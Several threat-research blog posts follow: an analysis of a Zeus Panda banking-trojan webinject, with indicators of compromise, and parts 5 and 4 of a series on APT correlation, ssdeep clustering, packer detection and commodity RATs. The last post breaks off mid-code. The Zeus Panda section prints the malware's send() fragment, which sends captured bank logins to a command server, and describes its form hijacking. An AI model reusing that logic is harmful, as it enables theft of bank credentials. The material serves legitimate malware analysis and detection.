  • Load and execute further target (bank) specific JavaScript code, as defined in the inject variable.
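
The browser check in the first bullet can be approximated from the decoded string table ("userAgent", "toLowerCase", "indexOf", "msie 6" through "msie 10", "firefox", and the labels "IE6" through "IE10", "FF", "OTHER"). The following is our reading of how these strings fit together, not the webinject's literal code; the function name and the rule table are assumptions.

```javascript
// Needle/label pairs as they appear in the decoded string table.
const BROWSER_RULES = [
  ["msie 6", "IE6"],
  ["msie 7", "IE7"],
  ["msie 8", "IE8"],
  ["msie 9", "IE9"],
  ["msie 10", "IE10"],
  ["firefox", "FF"],
];

// Classify a user agent string by simple substring search.
function classifyBrowser(userAgent) {
  const ua = userAgent.toLowerCase();
  for (const [needle, label] of BROWSER_RULES) {
    if (ua.indexOf(needle) !== -1) return label;
  }
  return "OTHER";
}

console.log(classifyBrowser("Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)"));
console.log(classifyBrowser("Mozilla/5.0 (X11; Linux x86_64; rv:51.0) Gecko/20100101 Firefox/51.0"));
```

The resulting label then decides which event listener is registered, for example DOMContentLoaded in the Firefox case.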

As it turns out, the first webinject stage is a generic loader to get target specific attack code from a web server. In this context ‘target’ refers to banks and payment service providers. This is not a remarkable fact in itself, as current webinjects tend to load the final attack in multiple stages. But maybe this server also includes further Zeus Panda components. So let’s take a closer look.

Target specific code and examples

After downloading the target specific second stage of the webinject, we were surprised about the actual size of the file: 91.8 KB.

A brief analysis showed a lot of functionality. Some of the functions are generic and work on every website. Others include target specific code, like specific HTML attributes. For example, the webinject uses unique id attributes to identify concrete websites of the online banking target. We are still investigating a lot of the included functionality at the time of writing. For now, we want to give a brief overview of selected parts of the basic functionality.

Figure 1: Flowchart of init function

After loading the target specific JavaScript, the init function shown in Figure 1 is called. First, the function checks if it is on top of the page. If not, the showpage() function is called, which searches for the identifier _brows.cap and deletes this DOM element if present. Otherwise the next check function are() is called, which searches for the strings “login”, “password” and “button”. If none of these strings can be found, the get() function is called to check if the user is currently logged in. This is done by checking for the presence of the logout element, which is only available when the user is currently logged in. If not, the already described showpage() function is triggered to clean up. Otherwise the status() function is used to set the status variable to the string “CP”. Afterwards the collected data is exfiltrated via the send() function, described in detail in the next section.

If all target strings were found (“login”, “password” and “button”), the next functions preventDefault() and stopPropagation() are called (left branch of Figure 1). This overwrites the default form action to collect the data the user enters into the form. Additionally the key event of the enter button (key code 13) is intercepted so that the form data is captured regardless of the submit method.

As this implementation does not work in Internet Explorer, the script checks for the presence of the cancelBubble property. If present, a specific Internet Explorer implementation is called, which provides the same functionality as the stopPropagation() function. As in the initial webinject, different code is available to support all major browsers.
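The cross-browser handling described above can be illustrated with a small helper. This is a minimal sketch and not code from the analyzed webinject: the names stopEvent and isEnterKey are assumptions made for illustration, and the sketch feature-tests the standard methods first instead of testing for cancelBubble as the sample does.

```javascript
// Hypothetical helper (not taken from the analyzed sample): suppress the
// default action and stop bubbling, with a fallback for legacy Internet Explorer.
function stopEvent(event) {
  if (typeof event.preventDefault === "function") {
    event.preventDefault(); // standard DOM
  } else {
    event.returnValue = false; // legacy Internet Explorer equivalent
  }
  if (typeof event.stopPropagation === "function") {
    event.stopPropagation(); // standard DOM
  } else {
    event.cancelBubble = true; // legacy Internet Explorer equivalent
  }
}

// Key code 13 is the Enter key, as mentioned in the text.
function isEnterKey(event) {
  return event.keyCode === 13;
}
```

Knowing this pattern helps when reading the sample: any handler that both cancels the default action and stops propagation on a login form deserves a closer look.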

After collecting form input data, the function status() is called to set the branch variable. The branch variable defines which action is triggered. In our callflow example (left branch), the value is set to the string “SL” which triggers a visible overlay of the website, indicating to the user that there is a temporary problem with the site. The following examples show two different target variations:

screen_status_sl_02
Figure 2: German example of a “temporarily unavailable” overlay
screen_status_sl
Figure 3: English example of a different target

Afterwards the send() function is triggered to exfiltrate the collected data.

Exfiltration

The next interesting part in the code is the exfiltration function used during this attack stage. The collected information is handed to a function called send():
send: function () {
    var l = link.gate + '?botid=' + _tables.encode(_brows.botid) + '&hash=' + new Date() + '&bname=' + _tables.get('bank');
    for (var i = 0; i < arguments.length; i++) {
        for (key in arguments[i]) {
            l += '&' + key + '=' + _tables.encode(arguments[i][key]);
        }
    }
// ... further code ...
This function simply appends all collected data as GET parameters and sends an HTTPS request to a PHP backend, defined in the variable link.gate. Depending on the target website, we observed different parameters and small differences in the construction of the parameter values. The following list gives an overview of the identified parameters. This list is not complete and some of the parameters are optional. All parameters are sent in plain text to the C2 backend.
Parameter name   Value
botid            Unique client identifier
bname            Target identifier
hash             Timestamp (new Date())
login1           user name
login2           user password
type             module type (grabber, ats, intercepts)
param1           start
domain           document.location
branch           Status to trigger different functionalities
We intend to provide further details in a follow-up post. However, now we need to talk about the backend. Behold the Zeus Panda administration panel:

Admin Panel Details

The webinject code naturally led us to C2 servers and a closer analysis led us to an admin panel on one of the servers we investigated.

overview_table
Figure 4: Admin-Panel

Figure 4 displays the start screen of the Admin-Panel. Every infected machine is displayed in one row. For every entry the following information is listed:

  1. BotId: Unique identifier for the compromised system
  2. The active module type
  3. Job status of the entry
  4. Login credentials (username/password)
  5. Account status
  6. Victim IP address
  7. Timestamp of infection
  8. Browser version
  9. Target URL (bank)

The top navigation bar lists some available filters like format settings, drop zones and further configuration settings.

The panel is used by the attacker to see new victim machines and available actions. By clicking on the entries, the attacker can view detailed information about the compromised user. For example, details like the account balance of the victim, the amount available for transfer and even the transaction limit can be displayed. Furthermore the attacker can attach notes to the specific victim, to keep track of his fraudulent actions.

overwied_detailed_01
Figure 5: Admin-Panel detail view

Conclusion

Banking Trojans are still one of the most valuable sources of income for criminals online. Given the fact that this kind of malware has been developed and optimized for many years, it’s not surprising that we can observe a rather high code quality. With the Admin-Panel, the attacker has a way to manage the compromised machines without the need to know technical infection details, making this kind of revenue stream accessible also to the technically rather illiterate.

In the follow-up blog post, we will take a closer look into target specific webinject scripts.

Indicators of compromise

Script-Stage                  IoC                                                                                    Functionality
1st stage                     SHA256: d8444c2c23e7469a518b303763edfe5fd38f9ffd11d42bfdba2663b9caf3de06               Loader
1st stage, initial webinject  _brows.botid, _brows.inject                                                            Loader
2nd stage                     SHA256: a99e2d6ec2a1c5b5e59c544302aa61266bb0b7d0d76f4ebed17a3906f94c2794               Exfiltration
2nd stage, target specific    \.php\?(&?(botid|hash|bname|login1|login2|type|param1|domain|branch)=[^&]*){4,9}$      Exfiltration
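The exfiltration pattern listed above can be applied to URLs taken from proxy or web server logs. The following is a minimal sketch: the regular expression is copied from the indicator list, while the helper name findExfilUrls and the sample URLs are made up for illustration.

```javascript
// Exfiltration pattern copied from the indicators of compromise above.
const EXFIL_PATTERN =
  /\.php\?(&?(botid|hash|bname|login1|login2|type|param1|domain|branch)=[^&]*){4,9}$/;

// Hypothetical helper: return only the URLs that match the pattern.
function findExfilUrls(urls) {
  return urls.filter((url) => EXFIL_PATTERN.test(url));
}

// Made-up log entries (example.invalid is a reserved test domain).
const sampleUrls = [
  "https://example.invalid/gate.php?botid=abc&hash=123&bname=bank&login1=user&login2=secret",
  "https://example.invalid/index.php?id=1",
  "https://example.invalid/gate.php?botid=abc&hash=123",
];

// Only the first entry carries at least four of the known parameters.
console.log(findExfilUrls(sampleUrls));
```

Because the pattern requires four to nine known parameters, requests carrying only one or two of them are not flagged.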

Authors: Manuel Körber-Bilgard and Karsten Tellmann

The Kings In Your Castle Part 5: APT correlation and do-it-yourself threat research

Welcome back to the fifth and last part of our blog series The Kings In Your Castle, where we aim to shed light on how A.P.T. functions, what targeted malware looks like and the issues we analysts might have with it. If you are interested in how it started, please check out parts 1, 2, 3 and 4; namely here, here, here and here.

In part 5 I will describe how we leveraged our gathered data for correlations, to unveil connections among targeted attacks reported to CIRCL’s MISP instance. Furthermore, this post looks at what happened after the presentation of our proof of concept at this year’s Troopers conference in Heidelberg. Large parts of the parsing and correlation functionality have made their way into the code base of MISP. Raphael Vinot has published the MISP Workbench, where MISP users can now perform their own correlation of events found in MISP.

Corre…what?

For starters, let’s define the term “correlation”. We define this as the uncovering of links of any kind among events reported to MISP. A requirement for reports that support a correlation is that they refer to one single event which goes beyond the general information already contained in MISP. Through this correlation we can glean extended knowledge of a toolset used by an actor as well as information on target preference. We also get to know about shared tools or techniques among two or more actors. We would also count it as a successful correlation if we find proof that two supposedly related events do not share any links at all.

A big step from classical (mass-)malware detection to research and mitigation of targeted attacks was to recognize patterns over time. The fundamental difference between targeted and non-targeted threats is that non-targeted threats do not know and/or care about their target. While campaigns of non-targeted threats also tend to improve over time, targeted actors have a significantly more developed need to stay ahead of their victims. This way, when tracking threat actors, one might spot new additions to their toolset, new intrusion techniques or even see them picking up new “business lines”.

Also, looking at malware campaigns from a historical perspective helps uncover false flags as well as attackers’ attempts to cover their tracks. This is especially significant when looking at how actors learned to do this over time.

With all of this reasoning in mind we dug through data sets with (and, occasionally, without) structured approaches, in order to unveil hidden treasures.

Naming is hard

And frequently, when uncovering supposedly unknown links among different events, we found ourselves poking at the very same group of aggressors, using the very same malware and attack methods as the linked event would show. But how come?

There are several reasons for this, the most obvious one being that two events were reported, commenting on differently named groups, but actually referring to the same one. This is an old issue in threat analytics; naming is hard. In most cases we quickly realized that each time we had a link, we were looking at identical events that were just named differently.

Probably the most popular case of multi-naming is Havex; otherwise known as EnergeticBear, DragonFly, or CrouchingYeti. This group has been mentioned in at least four different reports, with dedicated naming on all four. Similar cases have been observed for Sakula, also called BlackVine, and for WhiteElephant, also called Seven Pointed Dagger.

5_2_naming

What we found

The purpose of correlating different events was to try and find any existing links between events that were either instigated by different actors and/or performed at different points in time by the same group. For one, we wanted to prove that we could uncover links among sample sets and groups with little technical effort. For instance, we were able to spot a spear phishing attack within MISP which clearly related to other campaigns driven by an actor known as APT1. APT1 is said to be a Chinese group, performing a plenitude of attacks in (years?). It is hugely beneficial to have advance knowledge of past attacks and current changes to an attacker’s toolset. This is especially true if an attack by a specific group against a given target may be imminent or already in progress.

What also turned out to be interesting, though, was uncovering events documenting the same group, but extending the view to include the capabilities which were added over time. One example of this is TurboCampaign. This was first reported in 2014. At that time it went by the name of Shell_Crew. When spotted again in 2015, they sported a 64-bit Derusbi implant for Linux machines, which had not been observed earlier. It is unclear at this point whether this component was just missed in the 2014 report or if it was added less than a year later. The fact that attack groups learn as they go and extend their toolset is not surprising. This learning process gives us exactly the kind of information we set out to learn.

Other things we found in similar ways were for example a link between a report on The Dukes and another campaign dubbed Hammertoss; we linked an RTF spearphishing campaign from 2014 to the PittyTiger group, and we discovered a connection between RedOctober and the Inception Framework.

How to determine what’s related

We should underline again that what we did was not yet another machine learning exercise. The attributes outlined in previous episodes of this series can potentially serve in malware machine learning research, but exploring this was out of scope for what we had in mind. But what DID we do then?

We followed a rather simple approach. The set of indicators mentioned in blogpost #2, combined with attributes already present within MISP, went into a Redis backend, hosted on a powerful machine. Redis allows rather quick queries on large datasets in memory. By calculating hashes to index data items, large sets can be processed from different angles.

This way we can perform correlation runs based on IP addresses, domain names and file hashes, as well as compilation timestamps, original file names, import table and ssdeep hashes and many more. As mentioned last time, targeted malware is likely to not be packed or obfuscated. It is also likely to be reused, either in its compiled form or only as parts of its source code.
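The idea of indexing attributes so that events sharing a value can be looked up quickly can be sketched in a few lines. This is an illustration only, not the code that went into MISP: a JavaScript Map (itself a hash table) stands in for the Redis backend, and the function names, attribute types and sample values are assumptions.

```javascript
// In-memory stand-in for the Redis index: attribute key -> set of event ids.
const index = new Map();

// Attribute types that can safely be compared case-insensitively.
// (ssdeep hashes, for example, are case-sensitive and are left untouched.)
const CASE_INSENSITIVE = new Set(["domain", "md5", "sha256", "imphash"]);

// Hypothetical helper: normalize an attribute into a lookup key.
function attributeKey(type, value) {
  const text = String(value).trim();
  return `${type}:${CASE_INSENSITIVE.has(type) ? text.toLowerCase() : text}`;
}

function addAttribute(eventId, type, value) {
  const key = attributeKey(type, value);
  if (!index.has(key)) index.set(key, new Set());
  index.get(key).add(eventId);
}

// Return the events sharing at least one attribute with the given event,
// together with the attribute keys they have in common.
function correlate(eventId) {
  const related = new Map();
  for (const [key, events] of index) {
    if (!events.has(eventId)) continue;
    for (const other of events) {
      if (other === eventId) continue;
      if (!related.has(other)) related.set(other, []);
      related.get(other).push(key);
    }
  }
  return related;
}

// Made-up example data.
addAttribute("event-1", "domain", "c2.example.invalid");
addAttribute("event-1", "imphash", "AAAA1111");
addAttribute("event-2", "domain", "C2.example.invalid");
addAttribute("event-3", "imphash", "bbbb2222");

console.log(correlate("event-1")); // event-2 is linked via the shared domain
```

The same lookup works for any attribute type, which is what allows a data set to be viewed from different angles without re-scanning it.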

The following graphic illustrates a snapshot of data, related to one event within MISP. One can quickly identify certain patterns, as well as absent data. Naturally, PE-specific attributes can only be retrieved from Windows PE binaries. Help on that front is provided by ssdeep hashes, which also serve for file clustering approaches.

5_3_data

Ssdeep clustering

Ssdeep, apart from computing a piecewise hash of a given file or data blob, is capable of measuring the distance between two or among multiple ssdeep hashes. These distances are named match scores, weighted measures of how similar two given files are to each other. This is possible because ssdeep does not calculate cryptographic hashes, which identify the entire file, but hashes only pieces of a file. Those can then be compared to the piecewise hash of a different file. Naturally, this method can be extended to compare multiple files to one file, and also to look into groups of files, calculating distances among all of those.
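To make the principle of piecewise hashing and match scores more tangible, here is a deliberately simplified toy version. It is not the ssdeep algorithm: real ssdeep chooses block boundaries with a rolling hash (context triggered) and uses a weighted edit distance, whereas this sketch uses fixed-size blocks and a plain Levenshtein distance. All function names are assumptions.

```javascript
const ALPHABET =
  "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

// Toy signature: one character per fixed-size block (FNV-1a hash of the block).
function toySignature(bytes, blockSize = 64) {
  let signature = "";
  for (let start = 0; start < bytes.length; start += blockSize) {
    let hash = 0x811c9dc5;
    const end = Math.min(start + blockSize, bytes.length);
    for (let i = start; i < end; i++) {
      hash ^= bytes[i];
      hash = Math.imul(hash, 0x01000193) >>> 0;
    }
    signature += ALPHABET[hash % 64];
  }
  return signature;
}

// Classic Levenshtein edit distance between two strings.
function editDistance(a, b) {
  let previous = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    const current = [i];
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      current[j] = Math.min(previous[j] + 1, current[j - 1] + 1, previous[j - 1] + cost);
    }
    previous = current;
  }
  return previous[b.length];
}

// Toy match score from 0 (nothing in common) to 100 (identical signatures).
function matchScore(sigA, sigB) {
  const longest = Math.max(sigA.length, sigB.length);
  if (longest === 0) return 100;
  return Math.round(100 * (1 - editDistance(sigA, sigB) / longest));
}

// Made-up data: a 1 KB buffer and a copy with a single byte changed.
const original = Uint8Array.from({ length: 1024 }, (_, i) => (i * 7) % 251);
const patched = Uint8Array.from(original);
patched[500] ^= 0xff;

console.log(matchScore(toySignature(original), toySignature(patched)));
```

A cryptographic hash of the two buffers would differ completely, while the piecewise signatures differ in at most one position, so the score stays high.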

This principle allows for clustering of files, based on ssdeep hashes. The most popular implementation of ssdeep clustering, and also the one we based our toolchain on, is ssdc by Brian Wallace. As an extension to the original implementation of ssdc, we added a multi-process computation module and a Redis connector, to be able to store clustering results directly to the backend.

This way we are able to spot events which are “close” to each other based on similarities within the involved binaries. With this information one could, for instance, establish that a group targeting entities within Russia, is using malware which bears disturbing similarities to malware used by a (different..?) group targeting entities within Afghanistan and Tajikistan. Just saying….
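Clustering on pairwise match scores can be sketched as follows. This is not the ssdc implementation, only a minimal single-linkage grouping under stated assumptions: the score function is passed in by the caller (in practice it would be an ssdeep comparison), and the threshold and sample items are made up.

```javascript
// Group items whose pairwise score reaches the threshold (single linkage).
// `score` is any function returning 0..100 for two items.
function clusterByScore(items, score, threshold) {
  const parent = items.map((_, i) => i);
  const find = (i) => {
    while (parent[i] !== i) {
      parent[i] = parent[parent[i]]; // path halving
      i = parent[i];
    }
    return i;
  };
  for (let i = 0; i < items.length; i++) {
    for (let j = i + 1; j < items.length; j++) {
      if (score(items[i], items[j]) >= threshold) {
        parent[find(i)] = find(j); // merge the two groups
      }
    }
  }
  const clusters = new Map();
  items.forEach((item, i) => {
    const root = find(i);
    if (!clusters.has(root)) clusters.set(root, []);
    clusters.get(root).push(item);
  });
  return [...clusters.values()];
}

// Toy score for demonstration: items are "similar" if they share a first letter.
const toyScoreFn = (a, b) => (a[0] === b[0] ? 100 : 0);
console.log(clusterByScore(["a1", "a2", "b1"], toyScoreFn, 50));
```

Note that every pair of items is compared once, which is the reason the approach becomes expensive for large sample sets.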

Ssdeep clustering challenges

Processing fuzzy hashes is a very resource intensive task, even more so when clustering samples by them. This doesn’t scale well for sample sets of certain sizes. Our test set is limited, but given that most malware repositories deal with a sample size in the hundreds of thousands or bigger, some pre-sorting of groups of interest might be advisable. This pre-sorting of samples which match a certain set of criteria (e.g. events within a specific timeframe, targeted platforms only, geographical constraints) can speed up the clustering approach significantly.
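A quick back-of-the-envelope calculation shows why pre-sorting pays off when every sample has to be compared with every other one. The group sizes below are hypothetical and only serve to illustrate the order of magnitude.

```javascript
// Number of unordered pairs among n samples: n * (n - 1) / 2.
function pairCount(n) {
  return (n * (n - 1)) / 2;
}

// Comparing 100,000 samples all against each other:
const allPairs = pairCount(100000); // 4,999,950,000 comparisons

// Hypothetical pre-sorting into 100 groups of 1,000 samples each,
// comparing only within a group:
const groupedPairs = 100 * pairCount(1000); // 49,950,000 comparisons

console.log(allPairs, groupedPairs);
```

In this made-up scenario the number of comparisons drops by a factor of roughly one hundred.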

Lastly, it’s worth mentioning that ssdeep hashes, just like any other statically retrieved attribute, only help describe the outer surface of a sample. They do not carry information about the purpose or behavior of a binary, are easily disturbed by runtime packers and might even fail their purpose after malware authors apply a simple change in their compiler settings.

Taking things further: MISP Workbench

Please note that, by now, this kind of APT research has been performed by designated threat research teams for a long time and the presented techniques are not considered new. The community benefit we see here is the integration of our toolset into MISP’s open source code body, as well as providing results and conclusions to the broader public. Research of targeted attacks is difficult without access to a large malware set and high quality threat intelligence data.

So now here we are. With MISP Workbench the tools we developed and the data we gathered were integrated into the MISP platform in order to support incident responders and researchers to easily perform their own queries when investigating one or more events.

Workbench was built with the objective to incorporate all the presented features into one single tool. Also, it is intended to enhance the existing MISP dataset with a rich feature set, especially regarding the presented PE features. Workbench can now be used to easily group events by attacker tool sets; in connection with MISP Galaxy this is also possible with focus on dedicated adversaries. Workbench supports full text indexing and lookups for keywords, as well as picking through events on singular features or indicators.

Fine folks at CIRCL have built Workbench for standalone use, with a lightweight user interface. A more detailed description can be found here.

The following screenshot shows statistics about binary compilation timestamps within our targeted malware test set. One can quickly see how 1970 and 1992 must have been very busy years for lots of malware authors. Err… kidding, of course. But it does seem obvious how compilation timestamps, or even just parts of compilation timestamps, can occasionally serve as an interesting grouping attribute.

5_3_data2
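Grouping samples by compilation year takes only a few lines once the PE TimeDateStamp values have been extracted. The sketch below is an illustration with made-up sample values and assumed function names. A zeroed timestamp field decodes to 1970, and the constant 0x2A425E19 (19 June 1992) is commonly attributed to binaries built with older Delphi compilers, which would be one plausible explanation for the two "busy" years.

```javascript
// PE TimeDateStamp values are seconds since 1970-01-01 00:00:00 UTC.
function compileYear(timeDateStamp) {
  return new Date(timeDateStamp * 1000).getUTCFullYear();
}

// Count samples per compilation year.
function countByYear(timestamps) {
  const counts = new Map();
  for (const ts of timestamps) {
    const year = compileYear(ts);
    counts.set(year, (counts.get(year) || 0) + 1);
  }
  return counts;
}

// Made-up sample values: two zeroed fields, the 1992 constant, and 2015-01-01.
const samples = [0, 0, 0x2a425e19, 1420070400];
console.log(countByYear(samples));
```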

Furthermore, Workbench in combination with Galaxy supplies information about threat actors and events linked to them. This enables the analyst to search for links among threat actors on a binary feature level.

5_3_grouping

As mentioned, the extracted PE features can be used for grouping as well. The following screenshot shows how the filename ‘chrome.exe’ seems to be an all-time favorite of The Dukes, a threat actor operating out of Russia.

5_3_orifname

Finally

And here it ends, this lengthy blog series on Kings In Your Castle. The work will continue, of course. The tools presented, just as any information sharing platform such as MISP, live on the collective effort of contribution to the tool stack, the threat information base and the distribution chain. In that sense, questions and comments are welcome, just like pull requests, bug reports and feature ideas. At this point let me say thank you once more to my co-sufferer Raphael Vinot, as well as the team at CIRCL, the team at ERNW and Troopers conference for letting us present our work, as well as Morgan Marquis-Boire for supplying samples and ever more samples.

Happy APT hunting everyone 🙂

The Kings In Your Castle Part 4 – Packers, Crypters and a Pack of RATs

In part 4 of our series “The Kings In Your Castle”, we’re back with the question, what does sophistication even mean? I’ll be outlining what complexity from a malware analyst’s perspective means, why malware intends to be undecipherable and why it sometimes just wouldn’t even try. Also, this blog entry serves to present our findings on commodity RATs within the corpus of malware we analyzed, as part of our talk at Troopers conference in March.

If you are interested in previous parts of the series please check them out here, here and here.

What does sophistication even mean?

The complexity of software is a rather soft metric that hasn’t undergone much scrutiny in definition. For a malware analyst, this sphere even takes on a whole lot of different shades, as malware by nature aims to hide its threats. At least most of it, as one would think?

For analysts, what poses challenges are techniques such as code obfuscation or the use of well-fortified crypters. What also presents a remarkable challenge is structured application design, although this might sound somewhat counter-intuitive. Multi-component malware with a well thought-out object oriented design and highly dependent components causes more of a headache for an analyst than any crypter out there. In fact, many of the well-known high-profile attack toolsets aren’t protected by a packer at all. The assumption is that, for one, runtime packers potentially catch unwanted attention of security products; but also, for highly targeted attacks they might not even be necessary at all. Malware developers with sufficient dedication are very well able to hide a software’s purpose without the use of a runtime packer. So, why do we still see packed malware?

A software crypter is a piece of technology which obfuscates software and its intentions, and also changes its appearance. Crypters and packers are frequently applied to malware in order to ensure the reusability of the actual malcode. That way, when malware is detected once, the same detection will not apply to the same malware running on a different system.

Let’s take a step back though. The ‘perfect targeted attack’ is performed with a toolset dedicated to one target only. We can conclude that a crypter is needed if either the authors aren’t capable of writing undetectable malware, or, more likely, if the malware is intended to be reused. This makes sense if you consider that writing malware takes time and money: a custom attack toolset represents an actual (and quite substantial) investment.

Finally, with economic aspects in mind, we can conclude that attacks performed with plain tools are the more expensive ones, while attacks using packers and crypters to protect malware are less resource intensive.

4_1_sophistication

The actual hypothesis we had started our research with was that most targeted malware comes without a crypter. In more detail, we put forward the statement that targeted malware is significantly less protected than random malicious software. Again, random malware doesn’t know its target and by definition is intended to infect a large number of individuals, while targeted malware supposedly is designed for a limited number of targets.

Packer Detection (Like PEiD Was Broken)

Now, the usage statistics of runtime packers and crypters would be easy to gather from our respective dataset, if the available state-of-the-art packer detection tools weren’t stuck somewhere in 1997. The question whether a file is packed or not is in practice not trivially answered. One of the tools that is frequently used to identify packers is named PEiD. PEiD applies pre-defined signatures to the first code bytes starting from the executable entry point, which easily fails if the code at the packed binary’s entry point changes only slightly.

Aiming for more accurate results, we decided to come up with our own packer evaluation. We put together a set of indicators for abnormal binary structures, which are frequently seen in relation with runtime packers. Please note, the indicators are just that – indicators. The evaluation algorithm leaves some space for discrepancies. In practice though, manual analysis of randomly picked samples has proven the evaluation to be reasonably precise.

We gathered the following PE attributes:

  • Section count smaller than 3
  • Count of TLS sections bigger than 0
  • No imphash value present, thus import section empty or not parseable
  • Entropy value of code section smaller than 6.0 or bigger than 6.7
  • Entry point located in section which is not named ‘.text’, ‘.itext’ or ‘.CODE’
  • Ratio of Windows API calls to file size smaller than 0.1
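The entropy attribute in the list above refers to the Shannon entropy of the code section's bytes. As a minimal sketch of how such a value can be computed and checked against the listed thresholds (function names are assumptions, and reading the code section out of a PE file is left out):

```javascript
// Shannon entropy of a byte sequence, in bits per byte (0.0 to 8.0).
function shannonEntropy(bytes) {
  if (bytes.length === 0) return 0;
  const counts = new Array(256).fill(0);
  for (const b of bytes) counts[b]++;
  let entropy = 0;
  for (const count of counts) {
    if (count === 0) continue;
    const p = count / bytes.length;
    entropy -= p * Math.log2(p);
  }
  return entropy;
}

// Thresholds taken from the attribute list above.
function entropyIsSuspicious(entropy) {
  return entropy < 6.0 || entropy > 6.7;
}
```

Compressed or encrypted data tends towards 8 bits per byte, while long runs of identical bytes push the value towards 0, which is why both ends of the range are treated as anomalies.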

Of course, no single one of the gathered attributes is a surefire indicator in a packer evaluation process. In reality, some of the mentioned presumed anomalies are frequently seen within unpacked binaries, and depend, for example, on the executable’s compiler. Nevertheless, any of the mentioned features is reason enough to raise suspicion, and as mentioned before, the evaluation works rather reliably on our chosen dataset.

According to our algorithm, the values weigh into an evaluation score; based on the final score an analyst can then draw their conclusion. It is worth noting at this point that the chosen thresholds are quite sensitive, and one would expect to detect too many “potentially-packed” samples rather than too few.
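How such an evaluation score can be assembled from the listed attributes is sketched below. Please treat this strictly as an illustration: the per-attribute weights are hypothetical and were only chosen so that they add up to the maximum score of 220 mentioned in this post; the actual weights are in the published code. The field names of the input object are assumptions as well.

```javascript
// HYPOTHETICAL weights, not the authors' values. They merely sum to 220.
const WEIGHTS = {
  fewSections: 20,
  hasTls: 20,
  noImphash: 50,
  oddEntropy: 50,
  oddEntryPoint: 40,
  lowApiRatio: 40,
};

const CODE_SECTION_NAMES = [".text", ".itext", ".CODE"];

// `pe` is a plain object with pre-extracted attributes (field names assumed).
function packerIndicators(pe) {
  return {
    fewSections: pe.sectionCount < 3,
    hasTls: pe.tlsSectionCount > 0,
    noImphash: !pe.imphash,
    oddEntropy: pe.codeEntropy < 6.0 || pe.codeEntropy > 6.7,
    oddEntryPoint: !CODE_SECTION_NAMES.includes(pe.entryPointSection),
    lowApiRatio: pe.apiCallRatio < 0.1,
  };
}

// Sum the weights of all indicators that fired.
function packerScore(pe) {
  const indicators = packerIndicators(pe);
  return Object.keys(WEIGHTS).reduce(
    (sum, name) => sum + (indicators[name] ? WEIGHTS[name] : 0),
    0
  );
}

// Made-up example inputs.
const plainSample = { sectionCount: 5, tlsSectionCount: 0, imphash: "abc123",
  codeEntropy: 6.3, entryPointSection: ".text", apiCallRatio: 0.5 };
const packedLooking = { sectionCount: 2, tlsSectionCount: 1, imphash: "",
  codeEntropy: 7.9, entryPointSection: "UPX1", apiCallRatio: 0.01 };

console.log(packerScore(plainSample), packerScore(packedLooking));
```

Keeping the indicators separate from the weights makes it easy to inspect which attributes fired for a given sample before trusting the total.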

Further details about our packer evaluation method can be found within the published code.

The results can be found in the following charts, showing the evaluation values in relation to sample counts. The maximum score a sample can reach on our scale is 220, meaning that all evaluated attributes exceed the chosen threshold. The following graphics show the evaluation performed on a benign sample set, on a targeted malware sample set and on a random malware sample set. Attention should be paid to the sample frequency count on the y-axis of the graph.

benign
The benign set
targeted
The targeted malware set
random
The random malware set

The graphs show very well how roughly a third of the benign samples show low rated indicators, while for the random malware sample set, less than a third of the overall set shows no indicators and more than a third of the set shows remarkably high rated indicators. It should be mentioned that a look into benign samples rated at 40-50 revealed that most of them were packed with UPX, a binary packer used mainly for binary compression.

The remarkable bit at this point is that the set of targeted malware binaries has the overall lowest count of packer indicators. This leaves us with two possible conclusions. Following our hypothesis that targeted malware is significantly less protected by crypters than random malware, we take this result as proof.

On the other hand, what surely biases the result is that the chosen attributes are potentially influenced by the compilers used to compile the given binaries. This means though, as the results for the targeted set are notably homogeneous, that the larger part of targeted malware within our dataset has probably not experienced exotic compilers either. As a research idea for future analysis I’d like to put forward the somewhat far-fetched hypothesis that most targeted malware is written in C/C++ and compiled using the Visual Studio compiler. Curious, anyone?

Commodity RATs

Taking the question of malware sophistication further, in the past the analysis community was frequently astonished by yet another incredibly complex targeted malware campaign. While it is true that certain targets require a high level of attack sophistication, most campaigns do not require components for proprietary systems or extremely stealthy methods. An interesting case of high profile attacks being carried out with commodity malware was uncovered last year, when CitizenLab published their report about Packrat. Packrat is a South American threat actor, who has been active for around seven years, performing targeted espionage and disinformation campaigns in various South American countries. The actor is best known for targeting, among others, Alberto Nisman, the late Argentinean prosecutor, who was raising a case against the Argentinean government in 2015.

Whoever is responsible for said campaigns did have a clear image of whom to target. The actor certainly possessed sufficient personnel and financial resources, yet made a conscious decision to not invest in a high-end toolchain. Looking into the malware set used by Packrat, one finds a list of so-called commodity RATs, off-the-shelf malware used for remote access and espionage. The list of RATs includes CyberGate, XTremeRAT and AlienSpy; those tools themselves are well-known malware families associated with espionage.

Again, using repackaged commodity RATs is notably cheaper than writing custom malware. The key to remaining stealthy in this case is the usage of crypters and packers. In the end though, by not burning resources on a custom toolchain, the attacker can apply his resources otherwise, potentially even on increasing his target count.

Hunting down a RAT pack

Looking at the above facts, one question emerges: how prevalent are pre-built RATs within the analysis set at all? To establish a count of commodity RATs we again relied on detection names of Microsoft Defender. The anti-virus solution from Microsoft has shown in the past to be rather slow in picking up new detections, while providing quite accurate results once detections are deployed to the engines. Accuracy at this point includes a certain reliability when it comes to naming malware.

For evaluation, we chose to search for the following list of commodity malware:

  • DarkComet (Fynloski)
  • BlackShades (njRat, Bladabindi)
  • Adwind
  • PlugX
  • PoisonIvy (Poison)
  • XTremeRAT (Xtrat)
  • Handpicked RAT binaries

The selected set is what we noted seeing when going through the malware corpus manually. Please note, though, that the list of existing commodity RATs is far longer.
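Counting commodity RATs by detection name essentially boils down to matching each detection string against a table of family aliases. The following sketch uses the aliases from the list above; the function names and the sample detection strings are illustrative assumptions, and the handpicked binaries naturally cannot be covered by name matching.

```javascript
// Family names and detection-name aliases as given in the list above.
const RAT_ALIASES = {
  DarkComet: ["darkcomet", "fynloski"],
  BlackShades: ["blackshades", "njrat", "bladabindi"],
  Adwind: ["adwind"],
  PlugX: ["plugx"],
  PoisonIvy: ["poisonivy", "poison"],
  XTremeRAT: ["xtremerat", "xtrat"],
};

// Map a detection name to a RAT family, or null if none matches.
// Plain substring matching is crude; short aliases may over-match.
function ratFamily(detectionName) {
  const name = detectionName.toLowerCase();
  for (const [family, aliases] of Object.entries(RAT_ALIASES)) {
    if (aliases.some((alias) => name.includes(alias))) return family;
  }
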